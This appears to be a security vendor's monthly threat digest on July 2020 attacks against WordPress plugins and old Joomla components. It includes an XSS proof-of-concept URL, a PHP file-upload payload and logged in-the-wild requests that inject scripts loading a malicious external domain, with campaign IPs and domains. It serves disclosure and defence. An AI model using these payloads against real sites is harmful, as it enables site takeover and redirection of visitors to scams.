Vulnerabilities Digest: July 2020

Relevant Plugins and Vulnerabilities:

Highlights for July 2020:

• Cross site scripting is still the most common vulnerability in WordPress Plugins. Bad actors are taking advantage of the lack of restrictions in critical functions and issues surrounding user input data sanitization.
• Attackers continue to target old plugins with known vulnerabilities in an ongoing malware campaign targeting WordPress websites.
• Massive attacks on Joomla old components.

Details for these highlights can be found under the components listed below.

Asset CleanUp: Page Speed Booster

Last week, we reported multiple vulnerabilities in Asset CleanUp: Page Speed Booster caused by an improper handling of user input. This plugin has 80000 active installations. A successful attack can lead to malicious script execution.

Here are the details of one of those vulnerabilities:

Patch (version 1.3.6.7):

--- a/wp-asset-clean-up/trunk/classes/BulkChanges.php
+++ b/wp-asset-clean-up/trunk/classes/BulkChanges.php
 
     /**
-     * GlobalRules constructor.
+     * BulkChanges constructor.
      */
     public function __construct()
     {
-        $this->wpacuFor      = Misc::getVar('request', 'wpacu_for', $this->wpacuFor);
-        $this->wpacuPostType = Misc::getVar('request', 'wpacu_post_type', $this->wpacuPostType);
+        $this->wpacuFor      = sanitize_text_field(Misc::getVar('request', 'wpacu_for', $this->wpacuFor));
+        $this->wpacuPostType = sanitize_text_field(Misc::getVar('request', 'wpacu_post_type', $this->wpacuPostType));
 
-        if (Misc::getVar('request', 'wpacu_update') == 1) {
-            $this->update();
-        }
+        if (Misc::getVar('request', 'wpacu_update') == 1) {
+            $this->update();
+        }
     }

PoC:

/wp-admin/admin.php?page=wpassetcleanup_bulk_unloads&wpacu_for=%22name%2F%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E

Adning Advertising 

The paid plugin Adning Advertising, boasting over 8,800 license sales,  fixed a remote code execution caused by poor file validation.

Vulnerable Code:

$valid_formats = isset($_POST['allowed_file_types']) ? explode(',', $_POST['allowed_file_types']) : array('jpg');
        if( in_array('jpg', $valid_formats) )
        {
            $valid_formats[] = 'jpeg';
        }

PoC:

284258444925728623104048873990\x0d\x0aContent-Disposition: form-data; name=\"files[]\"; filename=\"index.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a<?php\x0aphpinfo();\x0a\x0d\x0a-----------------------------284258444925728623104048873990\x0d\x0[...Skipped...]623104048873990\x0d\x0aContent-Disposition: form-data; name=\"allowed_file_types\"\x0d\x0a\x0d\x0azip,jpg,png,gif,svg,mp4,php\x0d\x0a-----------------------------284258444925728623104048873990\x0d\x0aContent-Disposition: form-data; name=\"upload\"\x0d\x0a\x0d\x0a{\"folder\":\"items/56/\",\"dir\":\"/var/www/html/wordpress/wp-content/uploads/angwp/\",\"src\":\"http://vulnerable.site/wp-content/uploads/angwp/\"}\x0d\x0a-----------------------------284258444925728623104048873990--\x0d\x0a'     $'http://vulnerable.site/wp-admin/admin-ajax.php'

Attackers detect the presence of this plugin by requesting the following js file:

/wp-content/plugins/adning/webpack.config.js

This is a critical vulnerability that, when exploited, allows attackers to take control of an entire site.

Plugin Payloads in Ongoing Malware Campaign

Our team saw a number of new IPs and domains added to an ongoing campaign. This malware is typically found to redirect visitors to various kinds of scam landing pages — including tech support scams, fake lottery wins, and malicious browser notifications.

Malicious Domains & IPs detected in July

This month, two new malicious domains have been associated with this campaign exploiting known WordPress vulnerabilities:

• https://lobbydesires[.]com/location[.]js
• https://cls[.]balantfromsun[.]com/cls[.]js

The following IPs have been associated with this campaign:

112.96.166.247
195.54.160.21
91.208.99.2
77.247.181.162
51.83.99.191
52.228.31.213
178.33.227.167
163.172.125.41
80.82.68.202
50.62.134.81
95.211.230.211
46.105.108.212
35.224.226.217
62.210.140.4
[...]

Some Exploit Attempts Seen in the Wild

51.83.99.191 -- POST -- /wp-admin/admin-ajax.php?action=bt_bb_set_custom_css -- css=%3C%2Fstyle%3E%3Cscript++type%3Dtext%2Fjavascript+language%3Djavascript%3Eeval%28String.fromCharCode%2832%2C40%2C102%2C117%2C110%2C99%2C116%2C105%2C111%2C110%2C40%2C41%2C32%2C123%2C10%2C32%2C32%2C32%2C32%2C118%2C97%2C114%2C32%2C101%2C108%[..skipped.]%2C101%2C97%2C100%2C34%2C41%2C91%2C48%2C93%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C40%2C101%2C108%2C101%2C109%2C41%2C59%2C10%2C32%2C32%2C125%2C41%2C40%2C41%2C59%29%29%3B%3C%2Fscript%3E%3Cstyle%3E&post_id=1 -- 2020-07-02

80.82.68.202 -- POST -- /wp-admin/admin-ajax.php?action=save_map_name -- --d3d1abe25729e072c83682bb88d79b7b595bc70f7b359af1b6baf89966a4\x0D\x0AContent-Disposition: form-data; name=\x22fff\x22; filename=\x220.txt\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A0\x0D\x0A--d3d1abe25729e072c83682bb88d79b7b595bc70f7b359af1b6baf89966a4\x0D\x0AContent-Disposition: form-data; name=\x22mapName\x22\x0D\x0A\x0D\x0A\x22><script src='https://lobbydesires.com/location.js?la=1&v14' type=text/javascript></script>\x0D\x0A--d3d1abe25729e072c83682bb88d79b7b595bc70f7b359af1b6baf89966a4\x0D\x0AContent-Disposition: form-data; name=\x22mapID\x22\x0D\x0A\x0D\x0A1\x0D\x0A--d3d1abe25729e072c83682bb88d79b7b595bc70f7b359af1b6baf89966a4--\x0D\x0A -- 2020-07-04


51.83.99.191 -- POST -- /wp-admin/admin-ajax.php -- licenseEmail=%22%3E%3Cscript+type%3D%27text%2Fjavascript%27+src%3D%27https%3A%2F%2Flobbydesires.com%2Flocation.js%3Fla%3D1%27%3E%3C%2Fscript%3E&licenseNumber=43 -- 2020-07-04

178.33.227.167-- POST -- /wp-admin/admin-ajax.php?action=update_zb_fbc_code -- domain=%3C%2Fscript%3E%3Cscript+type%3D%27text%2Fjavascript%27+src%3D%27https%3A%2F%2Flobbydesires.com%2Flocation.js%3Fla%3D1%27%3E%3C%2Fscript%3E%3Cscript%3E -- 2020-07-06

51.83.99.191 -- POST -- /wp-admin/admin-ajax.php -- action=gen_save_cssfixfront&css=%3C%2Fstyle%3E%3Cscript+type%3D%27text%2Fjavascript%27+src%3D%27https%3A%2F%2Flobbydesires.com%2Flocation.js%3Fla%3D1%27%3E%3C%2Fscript%3E%3Cstyle%3E&cssfix=front -- 2020-07-06

52.228.31.213 -- GET -- /wp-admin/admin-post.php?swp_debug=load_options&swp_url=https://hastebin.com/raw/etonipusij -- - -- 2020-07-06

51.83.99.191 -- PUT -- /wp-admin/admin-post.php?page=social-metrics-tracker-export&smt_download_export_file=1&section=gapi -- gapi_client_id=%22%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27https%3A%2F%2Flobbydesires.com%2Flocation.js%3Fla%3D1%26v11%27%3E%3C%2Fscript%3E -- 2020-07-07


51.83.99.191 -- POST -- /wp-admin/admin-post.php -- action=simple_fields_do_import&import-json=%7B%0A++++%22field_groups%22%3A+%7B%0A++++++++%221%22%3A+%7B%0A++++++++++++%22id%22%3A+1%2C%0A++++++++++++%22key%22%3A+%22test%22%2C%0A++++++++++++%22slug%22%3A+%22test%22%2C%0A++++++++++++%22name%22%3A+%22test%[..skipped..]ups_count%22%3A+1%0A++++++++%7D%0A++++%7D%2C%0A++++%22post_type_defaults%22%3A+%5B%0A++++++++false%0A++++%5D%0A%7D&import-what=textarea&simple-fields-import-type=replace -- 2020-07-08

195.54.160.21 -- GET -- /wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&email=\x22><script type=text/javascript src='https://lobbydesires.com/location.js?la=1&v15'></script> -- - -- 2020-07-08

35.224.226.217 -- GET -- /wp-admin/admin-post.php?swp_debug=load_options&swp_url=https://hastebin.com/raw/etonipusij -- - -- 2020-07-20

62.210.140.4 -- GET -- /wp-admin/admin-ajax.php?action=wpdAddSubscription -- - -- 2020-07-29

178.33.227.167 -- GET -- /wp-admin/admin-ajax.php?action=wpuf_file_upload -- - -- 2020-07-29

New malicious campaign aiming old Joomla Components 

This month, we detected a spike in the number of requests targeting old Joomla components. These types of attacks are fairly common, but we’ve seen an increase during this month.  Successful attacks can lead to a full website compromise.

Old Component URLs Targeted

/index.php?option=com_adsmanager&task=upload&tmpl=component
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form
/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php
/administrator/components/com_civicrm//packages/OpenFlashChart/tmp-upload-images/vuln.php
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=
/index.php?option=com_myblog&task=ajaxupload
/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php
/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form
/administrator/components/com_simplephotogallery/lib/uploadFile.php
/components/com_jnews/includes/openflashchart/tmp-upload-images/sittir.php
/components/com_jbcatalog/libraries/jsupload/server/php
[...]

Public exploits already exist for all of the components listed above, and many other plugins are also under attack. You can check our previous lab notes for additional information from past reports.

To mitigate risk, we strongly encourage you to keep your website’s software and components up to date to prevent infection or vulnerability exploitation. Websites behind the Sucuri Firewall are virtually patched against these vulnerabilities.